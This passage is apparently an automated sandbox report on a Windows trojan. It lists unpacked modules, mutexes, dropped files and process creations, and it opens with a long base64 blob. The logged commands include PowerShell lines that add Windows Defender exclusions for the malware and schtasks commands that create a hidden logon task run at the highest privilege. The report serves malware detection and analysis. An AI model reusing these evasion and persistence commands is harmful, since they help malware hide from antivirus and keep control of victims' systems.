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
Source: 10.2.xcsUjVN.exe.2d46b08.1.raw.unpack, kZZryoOdRCGo.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 10.2.xcsUjVN.exe.2d46b08.1.raw.unpack, kZZryoOdRCGo.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.PXUVmodpCYqRIPQ.exe.4dc1ee8.3.raw.unpack, bOIpaUIYCKOAQAMIyB.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.PXUVmodpCYqRIPQ.exe.4dc1ee8.3.raw.unpack, bOIpaUIYCKOAQAMIyB.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.PXUVmodpCYqRIPQ.exe.3561010.2.raw.unpack, kZZryoOdRCGo.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.PXUVmodpCYqRIPQ.exe.3561010.2.raw.unpack, kZZryoOdRCGo.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.PXUVmodpCYqRIPQ.exe.356ceec.1.raw.unpack, kZZryoOdRCGo.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.PXUVmodpCYqRIPQ.exe.356ceec.1.raw.unpack, kZZryoOdRCGo.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.PXUVmodpCYqRIPQ.exe.3100000.0.raw.unpack, rhxrm7QLVMrJRP0Df6.cs Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.PXUVmodpCYqRIPQ.exe.3100000.0.raw.unpack, rhxrm7QLVMrJRP0Df6.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.PXUVmodpCYqRIPQ.exe.3100000.0.raw.unpack, rhxrm7QLVMrJRP0Df6.cs Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 0.2.PXUVmodpCYqRIPQ.exe.3100000.0.raw.unpack, bOIpaUIYCKOAQAMIyB.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.PXUVmodpCYqRIPQ.exe.3100000.0.raw.unpack, bOIpaUIYCKOAQAMIyB.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.PXUVmodpCYqRIPQ.exe.4d716c8.5.raw.unpack, bOIpaUIYCKOAQAMIyB.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.PXUVmodpCYqRIPQ.exe.4d716c8.5.raw.unpack, bOIpaUIYCKOAQAMIyB.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.PXUVmodpCYqRIPQ.exe.4d716c8.5.raw.unpack, rhxrm7QLVMrJRP0Df6.cs Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.PXUVmodpCYqRIPQ.exe.4d716c8.5.raw.unpack, rhxrm7QLVMrJRP0Df6.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.PXUVmodpCYqRIPQ.exe.4d716c8.5.raw.unpack, rhxrm7QLVMrJRP0Df6.cs Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 0.2.PXUVmodpCYqRIPQ.exe.4dc1ee8.3.raw.unpack, rhxrm7QLVMrJRP0Df6.cs Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.PXUVmodpCYqRIPQ.exe.4dc1ee8.3.raw.unpack, rhxrm7QLVMrJRP0Df6.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.PXUVmodpCYqRIPQ.exe.4dc1ee8.3.raw.unpack, rhxrm7QLVMrJRP0Df6.cs Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: classification engine Classification label: mal100.troj.evad.winEXE@57/30@0/1
Source: C:\Users\user\Desktop\PXUVmodpCYqRIPQ.exe File created: C:\Users\user\AppData\Roaming\xcsUjVN.exe Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7720:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2516:120:WilError_03
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Mutant created: NULL
Source: C:\Users\user\AppData\Roaming\xcsUjVN.exe Mutant created: \Sessions\1\BaseNamedObjects\k5CBmR5JDsDg
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7944:120:WilError_03
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Mutant created: \Sessions\1\BaseNamedObjects\HSXNklsDUBYtQeP
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1104:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7512:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7692:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5000:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7532:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3844:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7988:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7892:120:WilError_03
Source: C:\Users\user\Desktop\PXUVmodpCYqRIPQ.exe File created: C:\Users\user\AppData\Local\Temp\tmp6ABF.tmp Jump to behavior
Source: C:\Users\user\Desktop\PXUVmodpCYqRIPQ.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp4AB4.tmp.bat""
Source: PXUVmodpCYqRIPQ.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: PXUVmodpCYqRIPQ.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
Source: C:\Users\user\Desktop\PXUVmodpCYqRIPQ.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\PXUVmodpCYqRIPQ.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: PXUVmodpCYqRIPQ.exe ReversingLabs: Detection: 60%
Source: C:\Users\user\Desktop\PXUVmodpCYqRIPQ.exe File read: C:\Users\user\Desktop\PXUVmodpCYqRIPQ.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\PXUVmodpCYqRIPQ.exe "C:\Users\user\Desktop\PXUVmodpCYqRIPQ.exe"
Source: C:\Users\user\Desktop\PXUVmodpCYqRIPQ.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PXUVmodpCYqRIPQ.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\PXUVmodpCYqRIPQ.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\xcsUjVN.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\PXUVmodpCYqRIPQ.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xcsUjVN" /XML "C:\Users\user\AppData\Local\Temp\tmp6ABF.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\PXUVmodpCYqRIPQ.exe Process created: C:\Users\user\Desktop\PXUVmodpCYqRIPQ.exe "C:\Users\user\Desktop\PXUVmodpCYqRIPQ.exe"
Source: C:\Users\user\Desktop\PXUVmodpCYqRIPQ.exe Process created: C:\Users\user\Desktop\PXUVmodpCYqRIPQ.exe "C:\Users\user\Desktop\PXUVmodpCYqRIPQ.exe"
Source: unknown Process created: C:\Users\user\AppData\Roaming\xcsUjVN.exe C:\Users\user\AppData\Roaming\xcsUjVN.exe
Source: C:\Users\user\Desktop\PXUVmodpCYqRIPQ.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Taskshell" /tr '"C:\Users\user\AppData\Roaming\Taskshell.exe"' & exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\PXUVmodpCYqRIPQ.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp4AB4.tmp.bat""
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "Taskshell" /tr '"C:\Users\user\AppData\Roaming\Taskshell.exe"'
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout 3
Source: C:\Users\user\AppData\Roaming\xcsUjVN.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xcsUjVN" /XML "C:\Users\user\AppData\Local\Temp\tmp880B.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\xcsUjVN.exe Process created: C:\Users\user\AppData\Roaming\xcsUjVN.exe "C:\Users\user\AppData\Roaming\xcsUjVN.exe"
Source: unknown Process created: C:\Users\user\AppData\Roaming\Taskshell.exe C:\Users\user\AppData\Roaming\Taskshell.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Roaming\Taskshell.exe "C:\Users\user\AppData\Roaming\Taskshell.exe"
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\Taskshell.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\xcsUjVN.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xcsUjVN" /XML "C:\Users\user\AppData\Local\Temp\tmp948E.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Process created: C:\Users\user\AppData\Roaming\Taskshell.exe "C:\Users\user\AppData\Roaming\Taskshell.exe"
Source: unknown Process created: C:\Users\user\AppData\Roaming\Taskshell.exe "C:\Users\user\AppData\Roaming\Taskshell.exe"
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xcsUjVN" /XML "C:\Users\user\AppData\Local\Temp\tmpCF93.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Process created: C:\Users\user\AppData\Roaming\Taskshell.exe "C:\Users\user\AppData\Roaming\Taskshell.exe"
Source: unknown Process created: C:\Users\user\AppData\Roaming\Taskshell.exe "C:\Users\user\AppData\Roaming\Taskshell.exe"
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xcsUjVN" /XML "C:\Users\user\AppData\Local\Temp\tmpEF41.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Wi